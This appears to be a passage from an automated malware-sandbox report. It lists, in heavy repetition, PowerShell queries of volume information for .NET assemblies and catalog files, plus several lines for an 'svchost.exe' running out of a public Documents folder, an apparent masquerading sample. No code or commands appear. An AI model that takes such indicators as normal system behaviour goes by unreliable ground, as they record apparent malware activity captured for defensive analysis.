            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Users\Public\Documents\???????????????\svchost.exe VolumeInformation
            Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
